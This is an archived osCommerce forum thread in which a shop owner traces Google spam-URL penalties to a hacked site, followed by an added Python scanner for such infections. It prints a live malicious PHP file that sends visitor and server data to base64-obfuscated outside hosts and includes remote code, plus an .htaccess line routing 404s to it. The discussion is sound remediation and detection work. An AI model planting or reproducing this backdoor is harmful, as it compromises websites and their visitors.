luqi Posted June 1, 2008

I was removed from Google search results on the plea that my site had some URLs showing in search results and they all end with phtml. I can assure you that I do not have any files or URLs ending with phtml, but the fact remains that when I search in Google with my site name (space) phtml I find over 200 URLs showing against my site ending with phtml. The most interesting thing is that before the click it is my website URL, but after I click it lands on this page; one live example is below.

http://find.uz/search.php?q=firesrus%20pht...;said=e&d=5

If you visit this page then you can understand that this is a deceptive URL in Google search results and is not found in my FTP or site at all, though before the click it was showing in Google like: www.mysite.co.uk/catalog/1C.6.0.hasp.crack.phtml - 1k

I thought it could be a virus so I just bought Norton, downloaded my site, scanned all of it and found nothing. I do not understand what this is and how to get rid of it. Google has removed me once and restored my site, but out of 1500 URLs I can now see about three hundred URLs of my site including these phtml URLs, and it looks like Google has restricted my site to show fewer results in view of this problem, as these links are changing shape and quantity on a daily basis. I have pasted Google's mail below, but I have no clue what my fault is and what I am doing wrong. These URLs, for which I am penalised, are not part of my site.

Can anyone please throw light on what is happening: is it a website security issue, or the server, or some other technique hackers are enjoying and making money from through pay per impression etc.? In any case the bottom line is how I can get rid of this, as this site is my living.
Dear site owner or webmaster of (mysite).co.uk/catalog,

While we were indexing your webpages, we detected that some of your pages were using techniques that are outside our quality guidelines, which can be found here: http://www.google.com/webmasters/guidelines.html. This appears to be because your site has been modified by a third party. Typically, the offending party gains access to an insecure directory that has open permissions. Many times, they will upload files or modify existing ones, which then show up as spam in our index.

The following are some example URLs from your site:

mysite.co.uk/catalog/red.hot.tv.hack.pin.phtml
www.mysite.co.uk/catalog/Play.Cue.Club.crack.phtml
mysite.co.uk/catalog/19629.phtml

In order to preserve the quality of our search engine, we have temporarily removed some of your webpages from our search results. Currently pages from firesrus.co.uk/catalog are scheduled to be removed for at least 30 days.

We would prefer to have your pages in Google's index. If you wish to be reincluded, please correct or remove all pages (may not be limited to the examples provided) that are outside our quality guidelines. One potential remedy is to contact your web host technical support for assistance. For more information about security for webmasters, see http://googlewebmastercentral.blogspot.com...webmasters.html. When you are ready, please visit https://www.google.com/webmasters/tools/reinclusion?hl=en to learn more and submit your site for reconsideration.

Sincerely,
Google Search Quality Team
Jack_mcs Posted June 1, 2008

It isn't a virus, it's a hack (most likely) so an anti-virus program won't help. I only see 39 pages when I search Google for your total listings and those are mostly invalid links. You need to search your files for ones that shouldn't be there. A common trick of hackers is to add code that redirects your pages to some other location so the actual file may not be on your server. If this turns out to be the problem, then you should install the SiteMonitor contribution so you will know if this happens again.

Jack
luqi (Author) Posted June 1, 2008

Thanks for your help. I have a very heavily loaded osCommerce site with maybe a hundred additional contributions added to the store, and above all I am not a PHP expert, so is there any way to check which file is redirecting it? I have recently installed the Site Monitor contribution and for the future it may help, but how do I get rid of this issue? In my Google Webmaster Tools I see Google getting hold of all these phtml pages as "page cannot be displayed" pages and it will eventually remove them, but they keep being added by this trick/technique the hackers have adopted. It may be some freelancer (hacker) who has done it, as I keep hiring them through a freelancers' website for small jobs.
spooks Posted June 1, 2008

You could try using something like WinMerge to compare your local copy with the server one of your site.

Sam

Remember, What you think I ment may not be what I thought I ment when I said it.
Contributions: Auto Backup your Database, Easy way; Multi Images with Fancy Pop-ups, Easy way; Products in columns with multi buy etc etc; Disable any Category or Product, Easy way; Secure & Improve your account pages et al.
germ Posted June 1, 2008

Sam, I can't find your site URL, but check your images folder, and all subfolders, for "bogus" PHP files. They usually have all numbers as names, like "212425.php". There's a "hack" going around that plants these PHP files in your images folder, or any folder with "777" permissions. Folder permissions should be no higher than "755".

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.
"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me -
"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help
luqi (Author) Posted June 1, 2008

As a layman I would like to have some guidance, as it is not possible for me to go through each and every file, and hackers being so clever will very rarely name a file like hackers98765432.php etc. I assume he will try his best to dodge by making a very small change in the file name from the original file, which could deceive human eyes. To cut the story short, please give me your expert opinion on whether it is possible for a PHP programmer to search all site files with www in them. If this could be done then he can forward me all he found and then I could pinpoint the files having www or a redirect which does not concern me or my site contents. It will save a lot of labour and waste of time and effort, provided it can be done. I am sure a redirect would always go to a www address and not to any other place, or is there any technique to override this rule also? Your reply with expert opinion will be much appreciated please.
germ Posted June 1, 2008

I don't know what they may use for a file name. It could be they've added code to your existing file(s). If you can download your site's files to your PC, I'm guessing the rogue code will look something like this:

base64_decode("YS5yc2RjcmFmdC53cw==")

There's a post around here I can link you to that gives various methods of searching your site's files for code like this (on a Windows PC) if you need.
luqi (Author) Posted June 1, 2008

Yes please, I already downloaded the complete site last night and am now keen to know how I can find this code on a Windows PC. Please let me know.
germ Posted June 1, 2008

Click Me

I would just search for strings like this:

base64_decode

At least at first.
luqi (Author) Posted June 1, 2008

All of the above is very helpful so far, but searching for base64_decode produces no results. Some other keywords could help, as I really do not know what could be used in such code to redirect a site. Help appreciated please.
germ Posted June 1, 2008

I suppose the next would be the most obvious:

phtml
luqi (Author) Posted June 1, 2008

Sorry, no results produced. In Google, if you type firesrus phtml then you can see the results and behaviour of such links, and it may give you some idea as an expert.
germ Posted June 1, 2008

I could guess all day long (which I won't) and still not get any results. There are a million ways to "disguise" code. I think you need to find someone who knows "rogue code" when they see it and give them access to examine the files on your site. But that's just my opinion.
luqi (Author) Posted June 1, 2008

You are in fact right and I will try it, but I just searched and could hardly find any experts or companies offering this kind of service. It looks like it may be a very difficult job to perform, but anyhow I will continue and get back if some solution is found. It will help others at least. Kind regards for now, and your help is much appreciated.
spooks Posted June 1, 2008

I did some searches, and none of the pages found exist anymore. It's possible you've disgruntled some coder that put stuff on your site just to mess it up with Google, but has now removed it just to mess with your head. I've seen this done before, sorry I can't help with the hows though.

Sam
luqi (Author) Posted June 1, 2008

But the problem is that the inserted code generates more of them and Google keeps hunting them. This has been going on for a few months now.
spooks Posted June 1, 2008

Have you checked your site log to see if there are any regular accesses from elsewhere? Could be you have a back door set up and code is being uploaded that way.

Sam
luqi (Author) Posted June 1, 2008

All my permissions are 755 and I frequently change the FTP password.
luqi (Author) Posted June 1, 2008

Hi Jim, I think I have had a little success but am not sure, as I have found one HTML document with the name URLF, and when opened it says the following. You mentioned base64_decode, which is exactly as shown in the document below. Please let me know what this is.

base64_decode PHP 3.0 string base64_decode(string str) Decodes string using MIME base64 algorithm.
base64_encode PHP 3.0 string base64_encode(string str) Encodes string using MIME base64 algorithm.
parse_url PHP 3.0 array parse_url(string url) Parses a URL and returns its components.
rawurldecode PHP 3.0 string rawurldecode(string str) Decodes a URL-encoded string.
urldecode PHP 3.0 string urldecode(string str) Decodes URL-encoded string.
urlencode PHP 3.0 string urlencode(string str) URL-encodes a string.
germ Posted June 1, 2008

If that's all that's in it, it's not harmful.
luqi (Author) Posted June 1, 2008

There are two more documents, namely Configuration\Content\Reference\PHP\Reference.xml and Configuration\CodeColoring\CodeColoring.xml, which appeared in the same search, and their modification dates are also the same. These are very long files so I am not pasting them here, but maybe you recognise these files, or do they look foreign?
germ Posted June 1, 2008

XML docs aren't dangerous. You need to look for files with PHP, PL or CGI extensions. Most likely PHP.
luqi (Author) Posted June 3, 2008

I have now got the idea that these URLs are the outcome of "page cannot be displayed": if you insert any URL in Google it scans it and adds it to the Google search results, but when clicked, due to the stream not completing, it should give "page cannot be displayed". But since in my site there is a command that, instead of "page cannot be displayed", shows xyz search pages, this benefits the hackers.

I have noticed a PHP file in my images folder and its contents are below. I am pretty sure this is what is causing the problem but just want to be certain before I kill it. Please see the contents below.

<? error_reporting(0);$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$str=base64_encode($a).".".base64_encode($B).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s";
if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){}
else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

Also, I could see my .htaccess file outside www, and when I opened it I found this:

Options -MultiViews
ErrorDocument 404 /catalog/images/create.php

It looks like some command. Your help will be appreciated please.
germ Posted June 3, 2008

Both of those are BAD!!! Nuk'em!!!
luqi (Author) Posted June 3, 2008

Hi Jim, thanks for your fast replies and continuous support, as that really helped me to resolve this issue.

For all others who could face this problem, the catch is this: your 404 page is diverted to the hacker's AdSense page, where he benefits from pay per click etc.

How could he do it? A hacker is not only a proper hacker; it could also be any unethical freelancer who is installing your module and whom you hired for any small or big job. It could be a hacker if your file permissions are below 775, as they can gain access.

The catch is that Google accepts thousands of pages like www.yoursite.com/xyz and straight away accepts such links for search result pages against your site. If you search Google for site:yoursite.com then you should find listed all pages which are also in your FTP and complete stream and also open on the net. In the case of www.yoursite.com/xyz, this page will still be listed in your site results, which is a Google limitation, and I have already notified them that they should only accept live links in site submission. These dead links are not part of your site, so they try to show the 404 page, but code inserted in your site diverts the 404 page to the hacker's favourite page where he makes money.

I was surprised to see who was inserting these hundreds of pages in Google against my site name and from where, and the above was the final outcome of this whole exercise. The hacker has no job but keeps adding dead links in Google against sites he has hacked and keeps waiting for the reward.

I hope it will be educational for others, as I have tried to write in detail so even newbies can understand this trick. Site Monitor could save you from this trouble.

Thanks everyone for the great help. I wish I had posted it here six months ago and could have avoided so much of the business losses which I suffered due to removal from Google.
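An added example, not part of the original thread or any poster's code: a Python scan of a downloaded site copy for the three signs found in this thread (a script inside the images folder, an include of base64-decoded string literals, and an .htaccess ErrorDocument that points at a script), decoding the literals so they can be read. The rule names, the `UPLOAD_DIRS` set and the tree built by `make_sample()` are assumptions constructed for illustration.

```python
import base64, os, re, tempfile

# base64_decode("...") called with a string literal, as in the file quoted in the thread
B64_CALL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
INCLUDE = re.compile(r'\b(?:include|require)(?:_once)?\b', re.I)
# ErrorDocument directive whose handler is a script rather than a static page
ERRDOC = re.compile(r'^\s*ErrorDocument\s+(\d{3})\s+(\S+\.(?:php|phtml|pl|cgi))\s*$', re.I | re.M)
SCRIPT_EXT = {".php", ".phtml", ".pl", ".cgi"}
UPLOAD_DIRS = {"images"}  # assumption: folders that should contain no scripts

def decode_literals(text):
    """Return the plaintext of every base64 string literal passed to base64_decode()."""
    out = []
    for m in B64_CALL.finditer(text):
        try:
            out.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:  # literal is not valid base64; skip it
            pass
    return out

def scan_site(root):
    """Walk a downloaded site copy; return sorted (rule, relative_path, detail) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if name == ".htaccess":
                for m in ERRDOC.finditer(text):
                    findings.append(("errordocument-script", rel, m.group(1) + " -> " + m.group(2)))
            if os.path.splitext(name)[1].lower() in SCRIPT_EXT:
                if UPLOAD_DIRS & set(rel.split("/")[:-1]):
                    findings.append(("script-in-upload-dir", rel, ""))
                decoded = decode_literals(text)
                if decoded and INCLUDE.search(text):
                    findings.append(("include-of-decoded-string", rel, "".join(decoded)))
    return sorted(findings)

def make_sample():
    """Build a constructed site copy reproducing the two artifacts quoted in the thread."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "catalog", "images"))
    files = {
        ".htaccess": "Options -MultiViews\nErrorDocument 404 /catalog/images/create.php\n",
        "catalog/index.php": "<?php require('includes/application_top.php'); ?>\n",
        "catalog/images/create.php": '<? include(base64_decode("aHR0cDovLw==")'
                                     '.base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str); ?>\n',
    }
    for rel, body in files.items():
        with open(os.path.join(root, *rel.split("/")), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for finding in scan_site(make_sample()):
        print(finding)
```

Point `scan_site()` at the folder holding the downloaded copy; file permissions such as 777 do not survive an FTP download to Windows, so those still have to be checked on the server.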
Archived
This topic is now archived and is closed to further replies.